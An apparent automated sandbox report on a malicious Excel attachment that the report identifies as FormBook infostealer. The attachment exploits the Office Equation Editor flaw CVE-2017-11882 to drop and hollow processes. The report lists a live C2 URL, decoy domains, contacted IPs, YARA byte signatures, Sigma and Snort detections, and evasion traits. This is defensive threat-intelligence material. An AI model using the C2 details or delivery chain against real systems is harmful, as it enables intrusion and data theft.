Play interactive tour

Edit tour

Analysis Report MT OCEAN STAR ISO 8217 2005.xlsx

Overview

General Information

Sample Name:	MT OCEAN STAR ISO 8217 2005.xlsx
Analysis ID:	356585
MD5:	3ba4a9ceac60a4e52398ac6fbd0ebc5b
SHA1:	19b79bcd8982634747f1dfc6804687d60baf73b0
SHA256:	ca4c055b60e84b73461e21062fc06924897c501944ec0f2a467fc4c21f13b342
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Connects to a URL shortener service

Drops PE files to the user root directory

Injects a PE file into a foreign processes

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Executables Started in Suspicious Folder

Sigma detected: Execution in Non-Executable Folder

Sigma detected: Suspicious Program Location Process Starts

Tries to detect virtualization through RDTSC time measurements

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 928 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 1960 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2300 cmdline: 'C:\Users\Public\vbc.exe' MD5: 2201881C6CC2DE12C71F906E43178EF9)

vbc.exe (PID: 2608 cmdline: {path} MD5: 2201881C6CC2DE12C71F906E43178EF9)

explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

raserver.exe (PID: 2332 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 0842FB9AC27460E2B0107F6B3A872FD5)

cmd.exe (PID: 2820 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.aone223.com/67d/"], "decoy": ["initiationportal.com", "priority1fleet.com", "xn--c1abvlc0ba.xn--p1acf", "foto-golyh-devushek.com", "losangeles-nightlife.com", "mynewbandname.com", "iaiibhzsbw.net", "allwest-originals.com", "peakofgoodlife.com", "traeespana.com", "prizotinstagram.online", "powerd.net", "rutharroyo.com", "spreadtheaimee.com", "tomleefamily.com", "workingcompass.net", "quallateematerial.com", "davizion.com", "ashleeramdanfit.com", "gamers-evolution.com", "bohrabiz.com", "twigandbloomfloral.com", "nhdpartners.com", "wakedcma.com", "algulotomotiv.com", "kocaelikiralikvinc.com", "listenupfoundation.net", "studiozetamilano.com", "luckybluebird.net", "xigo100.com", "hattonpalacejewellery.com", "bolsasmariabonita.com", "didierjammet.com", "wndslve.com", "wiprideinc.com", "aktiv.plus", "americanseniorcarecorp.com", "calmbears.com", "gearsevenfitness.com", "naigves.com", "stremate.webcam", "awakenedbyowls.com", "pelican-foot.com", "t-c-o-t-c.com", "disinfectingcinci.com", "buyrealestatewithchris.com", "g-grid.net", "dodadungthongminh.asia", "prospect300.com", "rjutilities.com", "mylegalmavens.com", "talalmando.com", "localheroes.space", "writinglover.site", "brink100.com", "bim3dstudio.com", "absak-lab1.net", "torontodo.com", "repwebtools.com", "films4christians.com", "raptorroofingcompany.com", "lrrestoration.com", "zhongqinglvyou.com", "jangabeach.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.2352874272.00000000002A0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.2352874272.00000000002A0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.2352874272.00000000002A0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.2161460601.0000000003339000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.2161460601.0000000003339000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1c1bd0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1c1e3a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1ee1f0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1ee45a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1cd95d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1f9f7d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1cd449:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1f9a69:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1cda5f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1fa07f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1cdbd7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1fa1f7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1c2852:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1eee72:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1cc6c4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1f8ce4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1c354b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1efb6b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1d35ff:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ffc1f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d4602:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.2161460601.0000000003339000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1d06e1:$sqlite3step: 68 34 1C 7B E1 0x1d07f4:$sqlite3step: 68 34 1C 7B E1 0x1fcd01:$sqlite3step: 68 34 1C 7B E1 0x1fce14:$sqlite3step: 68 34 1C 7B E1 0x1d0710:$sqlite3text: 68 38 2A 90 C5 0x1d0835:$sqlite3text: 68 38 2A 90 C5 0x1fcd30:$sqlite3text: 68 38 2A 90 C5 0x1fce55:$sqlite3text: 68 38 2A 90 C5 0x1d0723:$sqlite3blob: 68 53 D8 7F 8C 0x1d084b:$sqlite3blob: 68 53 D8 7F 8C 0x1fcd43:$sqlite3blob: 68 53 D8 7F 8C 0x1fce6b:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.2192645978.0000000000080000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.2192645978.0000000000080000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.2192645978.0000000000080000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.2352906664.00000000002D0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.2352906664.00000000002D0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.2352906664.00000000002D0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.2192736589.0000000000210000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.2192736589.0000000000210000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.2192736589.0000000000210000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.vbc.exe.400000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.vbc.exe.400000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.vbc.exe.400000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x175f9:$sqlite3step: 68 34 1C 7B E1 0x1770c:$sqlite3step: 68 34 1C 7B E1 0x17628:$sqlite3text: 68 38 2A 90 C5 0x1774d:$sqlite3text: 68 38 2A 90 C5 0x1763b:$sqlite3blob: 68 53 D8 7F 8C 0x17763:$sqlite3blob: 68 53 D8 7F 8C
4.2.vbc.exe.340ea38.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.vbc.exe.340ea38.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xec198:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xec402:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1187b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x118a22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xf7f25:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x124545:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xf7a11:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x124031:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xf8027:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x124647:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xf819f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1247bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xece1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x11943a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xf6c8c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1232ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xedb13:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x11a133:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xfdbc7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x12a1e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xfebca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.vbc.exe.340ea38.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xfaca9:$sqlite3step: 68 34 1C 7B E1 0xfadbc:$sqlite3step: 68 34 1C 7B E1 0x1272c9:$sqlite3step: 68 34 1C 7B E1 0x1273dc:$sqlite3step: 68 34 1C 7B E1 0xfacd8:$sqlite3text: 68 38 2A 90 C5 0xfadfd:$sqlite3text: 68 38 2A 90 C5 0x1272f8:$sqlite3text: 68 38 2A 90 C5 0x12741d:$sqlite3text: 68 38 2A 90 C5 0xfaceb:$sqlite3blob: 68 53 D8 7F 8C 0xfae13:$sqlite3blob: 68 53 D8 7F 8C 0x12730b:$sqlite3blob: 68 53 D8 7F 8C 0x127433:$sqlite3blob: 68 53 D8 7F 8C
5.2.vbc.exe.400000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.vbc.exe.400000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.vbc.exe.400000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x183f9:$sqlite3step: 68 34 1C 7B E1 0x1850c:$sqlite3step: 68 34 1C 7B E1 0x18428:$sqlite3text: 68 38 2A 90 C5 0x1854d:$sqlite3text: 68 38 2A 90 C5 0x1843b:$sqlite3blob: 68 53 D8 7F 8C 0x18563:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 4 entries

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1960, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2300

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 54.67.62.204, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1960, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1960, TargetFilename: C:\Users\Public\vbc.exe

Sigma detected: Executables Started in Suspicious Folder

Show sources

Source: Process started

Sigma detected: Execution in Non-Executable Folder

Show sources

Source: Process started

Sigma detected: Suspicious Program Location Process Starts

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 5.2.vbc.exe.400000.1.unpack

Malware Configuration Extractor: FormBook {"C2 list": ["www.aone223.com/67d/"], "decoy": ["initiationportal.com", "priority1fleet.com", "xn--c1abvlc0ba.xn--p1acf", "foto-golyh-devushek.com", "losangeles-nightlife.com", "mynewbandname.com", "iaiibhzsbw.net", "allwest-originals.com", "peakofgoodlife.com", "traeespana.com", "prizotinstagram.online", "powerd.net", "rutharroyo.com", "spreadtheaimee.com", "tomleefamily.com", "workingcompass.net", "quallateematerial.com", "davizion.com", "ashleeramdanfit.com", "gamers-evolution.com", "bohrabiz.com", "twigandbloomfloral.com", "nhdpartners.com", "wakedcma.com", "algulotomotiv.com", "kocaelikiralikvinc.com", "listenupfoundation.net", "studiozetamilano.com", "luckybluebird.net", "xigo100.com", "hattonpalacejewellery.com", "bolsasmariabonita.com", "didierjammet.com", "wndslve.com", "wiprideinc.com", "aktiv.plus", "americanseniorcarecorp.com", "calmbears.com", "gearsevenfitness.com", "naigves.com", "stremate.webcam", "awakenedbyowls.com", "pelican-foot.com", "t-c-o-t-c.com", "disinfectingcinci.com", "buyrealestatewithchris.com", "g-grid.net", "dodadungthongminh.asia", "prospect300.com", "rjutilities.com", "mylegalmavens.com", "talalmando.com", "localheroes.space", "writinglover.site", "brink100.com", "bim3dstudio.com", "absak-lab1.net", "torontodo.com", "repwebtools.com", "films4christians.com", "raptorroofingcompany.com", "lrrestoration.com", "zhongqinglvyou.com", "jangabeach.com"]}

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.2352874272.00000000002A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2161460601.0000000003339000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2192645978.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2352735993.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2352906664.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2192736589.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.340ea38.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

Source: 5.2.vbc.exe.400000.1.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe

Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:	Binary string: RAServer.pdb^ source: vbc.exe, 00000005.00000002.2192755767.0000000000350000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, raserver.exe
Source:	Binary string: RAServer.pdb source: vbc.exe, 00000005.00000002.2192755767.0000000000350000.00000040.00000001.sdmp

Software Vulnerabilities:

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop esi	5_2_004172D3
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop edi	5_2_00416C8C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 4x nop then pop esi	7_2_000972D3
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 4x nop then pop edi	7_2_00096C8C

Source: global traffic

DNS query: name: ow.ly

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 54.67.62.204:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 54.67.62.204:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 216.239.32.21:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 216.239.32.21:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 216.239.32.21:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 34.102.136.180:80
